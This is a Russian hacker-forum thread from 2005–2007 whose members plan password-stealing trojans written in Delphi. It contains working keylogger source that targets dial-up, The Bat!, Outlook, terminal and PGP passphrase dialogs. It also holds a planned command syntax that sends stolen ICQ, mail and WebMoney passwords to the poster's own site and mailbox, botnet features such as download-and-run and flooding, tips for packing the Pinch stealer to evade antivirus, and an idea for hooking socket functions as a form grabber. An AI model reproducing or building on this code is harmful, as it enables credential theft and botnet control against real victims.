тырим пароли на делфях
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
тырим пароли на делфях - 2005-11-02 15:58:32
|
|
|
pixcher
Сообщений: 50
Оценки: 0
Присоединился: 2005-07-27 17:24:38
|
У кого-нибуть есть функции на delphi, для того чтоб выдирать пароли из:
-аутлука
-the bata
-пароли от подключения интернета
-icq
-mirinda
-и пароли, которые сохраняются осликом (автозаполнение)
????
Некоторые из этих функций у меня были (год назад увлекался програмированием троянов на delphi), но после форматирования диска ничего не осталось
Предлагаю общими усилиями написать навороченный троян/бот, который будет использовать технику маскировки руткитов + обход всех фаерволов (ну с фаерволами я и сам в принципе могу справиться =)))
|
|
|
|
|
тырим пароли на делфях - 2005-11-02 22:28:24
|
|
|
Nitrex
Сообщений: 404
Оценки: 0
Присоединился: 2004-09-12 23:24:27
|
имхо лучше это все делать на чистом API,иначе размер будет ОГО-ОГО.
А вообще возьми 2 сырец пинча(c47.ru)
Он написан на ASM'e и вставь этот код в дельфах… Вот и все…
|
|
|
|
|
тырим пароли на делфях - 2005-11-02 22:32:50
|
|
|
Parlament
Сообщений: 160
Оценки: 0
Присоединился: 2005-01-08 17:32:38
|
памоему пинч рулит адназнак… мнеб еще знания асемблера, я б улыбался… хатя пакую пинч, так че ни адин антивирь не палит, паэтаму пинч - [sm=em121.gif]
|
|
|
|
|
тырим пароли на делфях - 2005-11-03 03:47:14
|
|
|
pixcher
Сообщений: 50
Оценки: 0
Присоединился: 2005-07-27 17:24:38
|
я пол года назад пытался выдернуть код из пинча - но жестоко обламался…
моих знаний ассемблера не хватило =(
кто нибуть может сам выдрать и написать функции на делфи с асембл. вставками???
|
|
|
|
|
тырим пароли на делфях - 2005-11-03 11:02:34
|
|
|
-ddd-
Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
|
хЫх для етого много знаний и не надо :)
|
|
|
|
|
тырим пароли на делфях - 2005-11-03 18:15:10
|
|
|
Maslo
Сообщений: 717
Оценки: 0
Присоединился: 2005-08-11 21:51:47
|
В натуре, юзай API, только придетса попаритса - зачастую API занимает много времени.
|
|
|
|
|
тырим пароли на делфях - 2005-11-03 19:14:49
|
|
|
pixcher
Сообщений: 50
Оценки: 0
Присоединился: 2005-07-27 17:24:38
|
Кроме api функций я ничего и не использую и не использовал никогда.Если для кого нибудь не составит трудности написать здесь эти функции на делфях (я про функции, которые тырят пароли с asm вставками из pinch) пожалуйста выложите здесь
|
|
|
|
|
тырим пароли на делфях - 2005-11-04 06:33:30
|
|
|
-ddd-
Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
|
Я сегодня добрЫй, так что держЫ:
unit ksf;
interface
uses windоws,Controls,Forms, StdCtrls, Classes, ExtCtrls;
type
Tf1 = class(TForm)
t1: TTimer;
m1: TMemo;
procedure t1t(Sender: TоЬjесt);
end;
var
f1: Tf1;
okey:byte;
KAr:array[1..88] of pchar=('-Esc-','1','2','3','4','5','6','7','8','9',
'0','-','=','bsp','-Tab-','q','w','e','r','t','y','u','i','o','p',
'[',']','#13','-Ctrl-','a','s','d','f','g','h','j','k','l',';','''','`',
'-Shift-','\','z','x','c','v','b','n','m',',','.','/','-Shift-','*',
'Alt',' ','CL','F1','F2','F3','F4','F5','F6','F7','F8','F9','F10','NL',
'SL','-Home-','-Up-','-PgUp-','-','-Left-','-*5*-','-Right-','+',
'-End-','-Down-','-PDn-','-Ins-','-Del-','','','-Unk-','F11','F12');
implementation
{$R *.DFM}
procedure Tf1.t1t(Sender: TоЬjесt);
var
key:byte;
cap0:pchar;
cap1:string;
begin
getmem(cap0,255);
GetwindоwText(Getforegroundwindоw,cap0,255); //title активного окна
cap1:=cap0;
freemem(cap0);
if(pos('Connect To',cap1)< > 0)or //DialUP
(pos('Установка связи',cap1)< > 0)or //DialUP
(pos('Вход в систему',cap1)< > 0)or //DialUP
(pos('EType Dialer',cap1)< > 0)or //DialUP
(pos('p Networking',cap1)< > 0)or //DialUP
(pos('p Connection',cap1)< > 0)or //DialUP
(pos('Connecting to',cap1)< > 0)or //DialUP
(pos('Connessione a',cap1)< > 0)or //DialUP
(pos('Edit User - ',cap1)< > 0)or //The Bat!
(pos('Мастер подключения к Интернету',cap1)< > 0)or //MSIE,MSOutlook,etc
(pos('сетевого пароля',cap1)< > 0)or //MSIE
(pos('Свойства: ',cap1)< > 0)or //MSOutlook
(pos('Вход - ',cap1)< > 0)or //MSOutlook
(pos(' - Receiving mail',cap1)< > 0)or //The Bat!
(pos('Окно терминала',cap1)< > 0)or //Terminal
(pos('Passphrase',cap1)< > 0) //PGP Disk
then
begin
asm
in al,60h // Читаем из 60h порта нажатую кнопку в al
mov key,al // Перемещаем код ключа из al в Key
end;
if okey< > key then
begin
okey:=key;
if key< =88 then // Ловим Key_Down код
m1.text:=m1.text+kAr[Key] // И берем по этому коду из массива строку
end;
end;
end;
|
|
|
|
|
тырим пароли на делфях - 2005-11-05 05:58:21
|
|
|
DeathLess
Сообщений: 141
Оценки: 0
Присоединился: 2004-10-19 08:24:04
|
-ddd- Это еще что за хрень. [sm=9.gif]
А вообще в нете есть модуля на делфи дерганья пасов.
А если пиньч хочешь подрубить, то берешь просто компилишь его в obj файл и подключаешь в делфи. Воть.
|
|
|
|
|
тырим пароли на делфях - 2005-11-08 03:10:32
|
|
|
-ddd-
Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
|
Это исходняк на дельфи как он и просил:)
|
|
|
|
|
тырим пароли на делфях - 2005-11-08 11:05:48
|
|
|
DeathLess
Сообщений: 141
Оценки: 0
Присоединился: 2004-10-19 08:24:04
|
quote:
—————-<BR>Цитата: Дата:08.11.2005 3:10:32, Автор:-ddd- ::
&amp;#1069;то исходняк на дельфи как он и просил:)
—————-
Хм… Только пользы от этого исходника никакой. [sm=9.gif]
|
|
|
|
|
тырим пароли на делфях - 2005-11-08 15:22:21
|
|
|
-ddd-
Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
|
DeathLess мож для и не какой, а pixcher чет собрался делать:)
|
|
|
|
|
тырим пароли на делфях - 2005-11-09 01:29:01
|
|
|
pixcher
Сообщений: 50
Оценки: 0
Присоединился: 2005-07-27 17:24:38
|
Я неплохо разбираюсь в Делфях и планирую написать бот, который для маскировки будет использовать технику руткитов и поддерживать какое-то подобие скриптов в фаиле с командами.
Например можно будет в командном файле написать
http mysite.ru/phpSсгiрt.php?ip=$ip&icq=$icqpass&bat=$batpass&webmoney=$webmoneykeeperpass
mail mymail@mail.ru $ip$icqpass
первая команда будет делать get запрос, заменяя $ip на реальный ip $icqpass на пассворд от аськи и тд, а вторая соответственно отсылать всё это на мыло.
какую конструкцию легко можно будет использовать для заполнения БД с паролями от асек
(написав простенький скрипт на php можно будет собрать БД пасов, с возможностью поиска асек по маске или сделать, чтобы шестизначки сразу приходили тебе СМСкой на мобилу и тд - кароче очень удобно управлять ботнетом, просто переписывая этот скрипт)
конечно в боте будут присутствовать и такие "стандартные" функции, как флуд, скачай/запусти exeшку, автоматическое обновление - и тд…
Но к сожалению на просторах сети из функций выдирания пассов я нашёл только функцию, которая выдирает пасс из dualupа.Формграббер для меня тоже не проблема будет написать.Да и пароль wmкипера я смогу реализовать, через хэндлы окна программы + отослать ключ, предварительно зашифрованный в base64 .Но писать самому все функции выдирания паролей для всех программ - на это у меня уйдёт не одна неделя…или даже не один месяц =( Я бы выдрал функции из pincha, но к сожалению моих базовых знаний асм не хватает (да я знаю, что в Делфях можно подключать .obj файлы, скомпилённые на ассемблере, но какие функции юзать после подключения .obj - для меня загадка =)))
поэтому прошу помочь сэкономить моё время и подкинуть готовые примеры с этими функциями - или хотя бы напишите, в каких файлах или ветках реестра хранятся пассы от программ из списка - а я сам наваяю функции на делфях для выдирания и рассшифровки (я , конечно, могу сам "найти", где хранятся эти пассы, но тогда на изучение каждой проги придётся убить не мало времени)
вот…фуф…заранее спасибо…
|
|
|
|
|
RE: тырим пароли на делфях - 2007-07-24 03:34:18.626666
|
|
|
sever
Сообщений: 376
Оценки: 0
Присоединился: 2006-11-15 14:48:47.290000
|
одни разговоры а никто так и не выложил(((((
|
|
|
|
|
RE: тырим пароли на делфях - 2007-07-24 04:46:52.026666
|
|
|
-ddd-
Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
|
sever да вЫ батенька некрафил :)
|
|
|
|
|
RE: тырим пароли на делфях - 2007-07-24 08:23:03.210000
|
|
|
M0r1arty
Сообщений: 39
Оценки: 0
Присоединился: 2007-02-16 13:20:35.186666
|
А почему бы не перехватывать такие API функции как recv,send,bind,connect чтобы определять куда ломится приложение и если это HTTP(80) - перехватывать recv как формграббер,(110) - выдирать USER..PASS
Аналогично другие!
|
|
|
|
|
|
